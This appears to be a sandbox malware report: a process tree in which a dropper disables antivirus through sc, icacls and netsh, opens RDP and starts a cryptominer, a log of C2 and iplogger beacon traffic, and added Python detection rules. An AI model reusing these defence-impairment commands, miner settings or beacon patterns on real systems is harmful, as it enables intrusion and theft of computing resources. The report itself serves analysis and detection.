  Each cmd.exe was started as "C:\Windows\system32\cmd.exe /c <command>" and spawned sc.exe with that command. The sc.exe children carry no behaviour flags; cmd.exe PID 1528 is flagged "Suspicious use of WriteProcessMemory".

    cmd.exe PID  sc.exe PID  command
    1528         3996        sc start appidsvc
    4072         3976        sc start appmgmt
    2452         688         sc config appidsvc start= auto
    3112         4080        sc config appmgmt start= auto
    2972         1924        sc delete swprv
    3700         2176        sc stop mbamservice
    2416         1404        sc stop bytefenceservice
    3644         3304        sc delete bytefenceservice
    4088         3960        sc delete mbamservice
    1524         2508        sc delete crmsvc

  C:\Windows\SysWOW64\cmd.exe [depth 2] -> C:\Windows\SysWOW64\netsh.exe [depth 3]
  Each cmd.exe was started as "C:\Windows\system32\cmd.exe /c <command>" and spawned netsh.exe with that command; no behaviour flags on either side.

    cmd.exe PID  netsh.exe PID  command
    2492         2980           netsh advfirewall set allprofiles state on
    3188         2700           netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3040         1240           netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3820         68             netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    2184         2648           netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

  C:\Windows\SysWOW64\cmd.exe [depth 2] -> C:\Windows\SysWOW64\icacls.exe [depth 3]
  Each cmd.exe was started as "C:\Windows\system32\cmd.exe /c icacls <path> /deny <principal>:<rights>". Where the cmd.exe command line said %username%, cmd expanded it before spawning the child, so the icacls.exe command line reads Admin; the System/system rows were literal. Every icacls.exe child is flagged "Modifies file permissions".

    cmd.exe PID  icacls PID  principal  rights       path
    1776         2236        Admin      (OI)(CI)(F)  C:\Program Files (x86)\Microsoft JDX
    1032         1272        System     (OI)(CI)(F)  C:\Program Files (x86)\Microsoft JDX
    3932         2120        Admin      (OI)(CI)(F)  C:\Program Files\Common Files\System\iediagcmd.exe
    3164         3460        System     (OI)(CI)(F)  C:\Program Files\Common Files\System\iediagcmd.exe
    3012         3936        Admin      (OI)(CI)(F)  c:\programdata\microsoft\clr_optimization_v4.0.30318_64
    2428         1304        System     (OI)(CI)(F)  c:\programdata\microsoft\clr_optimization_v4.0.30318_64
    1748         1880        Admin      (OI)(CI)(F)  C:\Windows\Fonts\Mysql
    1316         4036        System     (OI)(CI)(F)  C:\Windows\Fonts\Mysql
    2640         948         Admin      (OI)(CI)(F)  c:\program files\Internet Explorer\bin
    3492         3472        system     (OI)(CI)(F)  c:\program files\Internet Explorer\bin
    1832         1932        Admin      (OI)(CI)(F)  C:\Windows\speechstracing
    2232         1476        system     (OI)(CI)(F)  C:\Windows\speechstracing
    3904         2020        Admin      (F)          c:\programdata\Malwarebytes
    2588         2984        System     (F)          c:\programdata\Malwarebytes
    2960         3980        Admin      (F)          C:\Programdata\MB3Install
    3280         808         System     (F)          C:\Programdata\MB3Install
    3356         1284        Admin      (OI)(CI)(F)  C:\Programdata\Indus
    4000         3308        System     (OI)(CI)(F)  C:\Programdata\Indus
    1448         1956        Admin      (OI)(CI)(F)  C:\AdwCleaner
    1760         3480        Admin      (OI)(CI)(F)  C:\Program Files\ByteFence
    2908         2156        Admin      (OI)(CI)(F)  C:\KVRT_Data
    3248         2172        system     (OI)(CI)(F)  C:\KVRT_Data
    2404         1336        Admin      (OI)(CI)(F)  C:\Program Files (x86)\360
    2152         3524        Admin      (OI)(CI)(F)  C:\ProgramData\360safe
    3916         1384        Admin      (OI)(CI)(F)  C:\Program Files (x86)\SpyHunter
    2220         2200        Admin      (OI)(CI)(F)  C:\Program Files\Malwarebytes
    4132         4188        Admin      (OI)(CI)(F)  C:\Program Files\COMODO
    4216         4260        Admin      (OI)(CI)(F)  C:\Program Files\Enigma Software Group
    4280         4360        Admin      (OI)(CI)(F)  C:\Program Files\SpyHunter
    4420         4464        Admin      (OI)(CI)(F)  C:\Program Files\AVAST Software
    4512         4556        Admin      (OI)(CI)(F)  C:\Program Files (x86)\AVAST Software
    4576         4620        Admin      (OI)(CI)(F)  C:\Programdata\AVAST Software
    4656         4748        Admin      (OI)(CI)(F)  C:\Program Files\AVG
    4776         4820        Admin      (OI)(CI)(F)  C:\Program Files (x86)\AVG
    4840         4884        Admin      (OI)(CI)(F)  C:\ProgramData\Norton
    4904         4948        Admin      (OI)(CI)(F)  C:\Programdata\Kaspersky Lab
    4968         5012        system     (OI)(CI)(F)  C:\Programdata\Kaspersky Lab
    5064         4312        Admin      (OI)(CI)(F)  C:\ProgramData\Kaspersky Lab Setup Files
    4292         4452        system     (OI)(CI)(F)  C:\ProgramData\Kaspersky Lab Setup Files
    4604         4700        Admin      (OI)(CI)(F)  C:\Program Files\Kaspersky Lab
    4724         4808        system     (OI)(CI)(F)  C:\Program Files\Kaspersky Lab
    4788         4864        Admin      (OI)(CI)(F)  C:\Program Files (x86)\Kaspersky Lab
    4920         4924        system     (OI)(CI)(F)  C:\Program Files (x86)\Kaspersky Lab
    5020         4980        Admin      (OI)(CI)(F)  C:\ProgramData\Doctor Web
    5048         5100        Admin      (OI)(CI)(F)  C:\ProgramData\grizzly
    4112         4108        Admin      (OI)(CI)(F)  C:\Program Files (x86)\Cezurity
    4124         4144        Admin      (OI)(CI)(F)  C:\Program Files\Cezurity
    4264         4296        Admin      (OI)(CI)(F)  C:\ProgramData\McAfee
    3584         4444        Admin      (OI)(CI)(F)  C:\Program Files\Common Files\McAfee
    4368         4472        Admin      (OI)(CI)(F)  C:\ProgramData\Avira
    4552         4580        Admin      (OI)(CI)(F)  C:\Program Files (x86)\GRIZZLY Antivirus
    4600         4544        Admin      (OI)(CI)(F)  C:\Program Files\ESET
    4800         4784        system     (OI)(CI)(F)  C:\Program Files\ESET
    4848         4940        Admin      (OI)(CI)(F)  C:\ProgramData\ESET
    4928         5072        system     (OI)(CI)(F)  C:\ProgramData\ESET
    4104         4416        Admin      (OI)(CI)(F)  C:\Program Files (x86)\Panda Security

  C:\Programdata\Install\utorrent.exe  [depth 2, PID 2940]
    - Executes dropped EXE
    - Drops file in Program Files directory
    - NTFS ADS
    C:\ProgramData\WindowsTask\azur.exe  [depth 3, PID 4212]
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 4404]
        cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
        C:\Windows\SysWOW64\timeout.exe  [depth 5, PID 5088]
          cmdline: C:\Windows\system32\timeout.exe 3
          - Delays execution with timeout.exe
    C:\ProgramData\WindowsTask\system.exe  [depth 3, PID 4988]
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 2660]
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
    C:\ProgramData\RDPWinst.exe  [depth 3, PID 4468]
      cmdline: C:\ProgramData\RDPWinst.exe -u
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SYSTEM32\netsh.exe  [depth 4, PID 5024]
        cmdline: netsh advfirewall firewall delete rule name="Remote Desktop"
    C:\ProgramData\RDPWinst.exe  [depth 3, PID 4836]
      cmdline: C:\ProgramData\RDPWinst.exe -i
      - Executes dropped EXE
      - Modifies WinLogon
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SYSTEM32\netsh.exe  [depth 4, PID 5108]
        cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\ProgramData\Windows\rutserv.exe  [depth 1, PID 3752]
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
C:\Programdata\RealtekHD\taskhost.exe  [depth 1, PID 4484]
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: GetForegroundWindowSpam
  C:\Programdata\WindowsTask\winlogon.exe  [depth 2, PID 4432]
    - Executes dropped EXE
    C:\Windows\SysWOW64\cmd.exe  [depth 3, PID 4560]
      cmdline: C:\Windows\system32\cmd.exe /C schtasks /query /fo list
      C:\Windows\SysWOW64\schtasks.exe  [depth 4, PID 4624]
        cmdline: schtasks /query /fo list
  C:\Windows\system32\cmd.exe  [depth 2, PID 4380]
    cmdline: C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    C:\Windows\system32\ipconfig.exe  [depth 3, PID 4424]
      cmdline: ipconfig /flushdns
      - Gathers network information
  C:\Windows\system32\cmd.exe  [depth 2, PID 4592]
    cmdline: C:\Windows\system32\cmd.exe /c gpupdate /force
    C:\Windows\system32\gpupdate.exe  [depth 3, PID 4836]
      cmdline: gpupdate /force
  C:\ProgramData\WindowsTask\audiodg.exe  [depth 2, PID 4396]
    - Executes dropped EXE
  C:\ProgramData\WindowsTask\MicrosoftHost.exe  [depth 2, PID 4640]
    cmdline: C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
\??\c:\windows\system32\svchost.exe  [depth 1, PID 5028]
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s TermService
C:\Windows\System32\svchost.exe  [depth 1, PID 4568]
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\svchost.exe  [depth 1, PID 4244]
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\System32\svchost.exe  [depth 1, PID 4424]
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
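The process tree above is a compact catalogue of persistence and defence impairment: schtasks entries named under Microsoft\Windows\Wininet\ that point into ProgramData and run at /RL HIGHEST, sc stop/delete against security-product services, inbound SMB (445/139) blocked and inbound RDP opened through netsh, dozens of explicit icacls /deny ACEs on security-product directories, and a stratum mining-pool URL on a command line. The Python below is an added example, not code from the Triage report or from the sample: it runs a small rule set over command lines and returns tagged findings, which is the shape a detection engineer would give such rules before wiring them to a process-creation log source. The entries in SAMPLE_CMDLINES are copied from this tree; the tag names, severities and SECURITY_PRODUCT_HINTS list are my own choices.

```python
import re
from dataclasses import dataclass

# Lower-case fragments of service names and paths belonging to the security
# products this sample targets (my own list, extend for your estate).
SECURITY_PRODUCT_HINTS = (
    "malwarebytes", "mbam", "mb3install", "adwcleaner", "bytefence", "kvrt",
    r"\360", "spyhunter", "comodo", "enigma software", "avast", r"\avg",
    "norton", "kaspersky", "doctor web", "grizzly", "cezurity", "mcafee",
    "avira", r"\eset", "panda security",
)

# Constructed sample: command lines copied from the process tree above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST',
    "sc delete mbamservice",
    "sc stop bytefenceservice",
    "sc delete swprv",
    "sc config appidsvc start= auto",
    'netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN',
    'netsh advfirewall firewall delete rule name="Remote Desktop"',
    'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow',
    r'icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)',
    r'icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)',
    r'icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)',
    r"C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1",
    "ipconfig /flushdns",
]


@dataclass(frozen=True)
class Finding:
    tag: str       # machine-readable label, e.g. "persistence.scheduled_task"
    severity: str  # "high" | "medium" | "low"
    detail: str    # what fired, for the analyst


def _opt(args, flag):
    """Value after a schtasks-style /FLAG, quoted or bare; None if absent."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', args, re.I)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))


def _is_security_product(text):
    t = text.lower()
    return any(h in t for h in SECURITY_PRODUCT_HINTS)


def analyze(cmdline):
    """Map one command line to a list of Findings (empty when no rule fires)."""
    cmd = cmdline.strip()
    # schtasks /create: persistence; weight masquerading names, payloads in
    # ProgramData and /RL HIGHEST.
    m = re.search(r'schtasks(?:\.exe)?"?\s+/create\b(.*)$', cmd, re.I)
    if m:
        args = m.group(1)
        name, target = _opt(args, "/TN") or "?", _opt(args, "/TR") or "?"
        notes = []
        if name.lower().startswith("microsoft\\windows\\"):
            notes.append("name imitates a built-in task")
        if "\\programdata\\" in target.lower():
            notes.append("payload under ProgramData")
        if (_opt(args, "/RL") or "").upper() == "HIGHEST":
            notes.append("runs with highest privileges")
        return [Finding("persistence.scheduled_task", "high" if notes else "medium",
                        "; ".join([f"{name} -> {target} ({_opt(args, '/SC')})"] + notes))]
    # sc.exe: services stopped/deleted (high for a security product) or forced
    # to auto-start.
    m = re.match(r'(?:.*[\\/])?sc(?:\.exe)?"?\s+(start|stop|delete|config)\s+(\S+)\s*(.*)$', cmd, re.I)
    if m:
        verb, svc, rest = m.group(1).lower(), m.group(2), m.group(3)
        if verb in ("stop", "delete"):
            hit = _is_security_product(svc)
            return [Finding("impair_defenses.security_service" if hit else f"service.{verb}",
                            "high" if hit else "medium", f"sc {verb} {svc}")]
        if verb == "config" and "start= auto" in rest.lower():
            return [Finding("service.autostart", "low", f"{svc} set to start= auto")]
        return []
    # netsh advfirewall: inbound SMB blocked, inbound RDP allowed, rule deleted.
    m = re.search(r'netsh(?:\.exe)?\s+advfirewall\s+firewall\s+(add|delete)\s+rule\s+(.*)$', cmd, re.I)
    if m:
        kv = {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', m.group(2))}
        port, action = kv.get("localport"), kv.get("action", "").lower()
        if m.group(1).lower() == "delete":
            return [Finding("firewall.rule_deleted", "medium", f"rule {kv.get('name')!r} removed")]
        if action == "block" and port in ("445", "139") and kv.get("dir", "").lower() == "in":
            return [Finding("firewall.block_smb_inbound", "medium", f"{kv.get('protocol')}/{port} blocked inbound")]
        if action == "allow" and port == "3389":
            return [Finding("firewall.allow_rdp_inbound", "high", "inbound RDP opened")]
        return []
    # icacls /deny: explicit deny ACE; high on a security product's directory.
    m = re.search(r'icacls(?:\.exe)?\s+(?:"([^"]+)"|(\S+))\s+/deny\s+([^:\s]+):(\S+)', cmd, re.I)
    if m:
        path, principal, rights = m.group(1) or m.group(2), m.group(3), m.group(4)
        hit = _is_security_product(path)
        return [Finding("impair_defenses.acl_deny" if hit else "acl.deny", "high" if hit else "medium",
                        f"{principal} denied {rights} on {path}")]
    # Stratum pool URL on the command line: cryptominer.
    m = re.search(r'stratum\+(?:tcp|ssl)://([^\s"]+)', cmd, re.I)
    if m:
        return [Finding("cryptominer.stratum_pool", "high", f"pool {m.group(1)}")]
    return []


def triage(cmdlines):
    """Run every rule over a list of command lines, preserving order."""
    return [f for c in cmdlines for f in analyze(c)]
```

Feed `triage()` the CommandLine field of Sysmon event 1 or Security event 4688 and each rule fires independently, so the one sc.exe that touches a product you do not run still surfaces as a plain service.delete. The icacls rule flags paths that are not in the hint list (C:\Windows\Fonts\Mysql here) at medium rather than dropping them: a deny ACE placed by a user process on a system directory is worth a look whatever the name.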
Network
-
Remote address:8.8.8.8:53Requestrms-server.tektonit.ruIN AResponserms-server.tektonit.ruIN A185.175.44.167
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json HTTP/1.1
User-Agent: AutoIt
Host: ip-api.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 48
X-Rl: 43
-
Remote address:8.8.8.8:53Requestfreemail.freehost.com.uaIN AResponsefreemail.freehost.com.uaIN A194.0.200.251
-
Remote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
Remote address:109.248.11.138:80RequestGET /STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 12:26:16 GMT
ETag: "6-5affa30aaa2a7"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "4-5aff97cbe9aa2"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "c-5aff97cbe0e04"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /S.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "d-5aff97cbc970a"
Accept-Ranges: bytes
Content-Length: 13
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
Remote address:109.248.11.138:80RequestGET /L2.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:37:46 GMT
ETag: "6-5aff98331e094"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "4-5aff97cbe9aa2"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "c-5aff97cbe0e04"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /S.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "d-5aff97cbc970a"
Accept-Ranges: bytes
Content-Length: 13
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestdashost.clubIN AResponsedashost.clubIN A185.212.148.107
-
Remote address:185.212.148.107:80RequestGET /ex20mac/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "6-5aff46784bb87"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/loaderTOP.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.25 (Debian)
Content-Length: 274
Content-Type: text/html; charset=iso-8859-1
-
Remote address:185.212.148.107:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff4671e9f6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
ETag: "22-5aff46713647c"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "2a-5aff467198e94"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "23-5aff467226829"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff46717b9d7"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Login.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "4-5aff46782796a"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Password.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "c-5aff46782d72a"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Server.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 12:01:17 GMT
ETag: "e-5aff9d755a10d"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/configCPUX.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:06 GMT
ETag: "6b-5aff4677b0734"
Accept-Ranges: bytes
Content-Length: 107
Vary: Accept-Encoding
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff4671e9f6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
ETag: "22-5aff46713647c"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "2a-5aff467198e94"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "23-5aff467226829"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff46717b9d7"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:8.8.8.8:53Requeststcubegames.netxi.inIN AResponsestcubegames.netxi.inIN A185.143.145.9
-
Remote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 101
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 4417
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN CNAMEgithub.map.fastly.netgithub.map.fastly.netIN A151.101.0.133github.map.fastly.netIN A151.101.64.133github.map.fastly.netIN A151.101.128.133github.map.fastly.netIN A151.101.192.133
-
Remote address:151.101.0.133:443RequestGET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
Date: Wed, 18 Nov 2020 13:40:52 GMT
X-Served-By: cache-ams21063-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605706852.196012,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: e0d1506eedd57427870340371a5a28b4f6feb6a4
Expires: Wed, 18 Nov 2020 13:45:52 GMT
Source-Age: 103
-
Remote address: 8.8.8.8:53
Request
iplogger.org IN A
Response
iplogger.org IN A 88.99.66.31
-
Remote address: 88.99.66.31:443
Request
GET /1qW3y7 HTTP/1.1
User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 26444)
Host: iplogger.org
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:54 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=oo6moggetpd61vt6j76plblok6; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 47352d4554663a59d80759e37d0d0d37790bef9cc35fcdd15935e3650cb30a7f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
Remote address: 8.8.8.8:53
Request
raw.githubusercontent.com IN A
Response
raw.githubusercontent.com IN CNAME github.map.fastly.net
github.map.fastly.net IN A 151.101.0.133
github.map.fastly.net IN A 151.101.64.133
github.map.fastly.net IN A 151.101.128.133
github.map.fastly.net IN A 151.101.192.133
-
Remote address: 151.101.0.133:443
Request
GET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
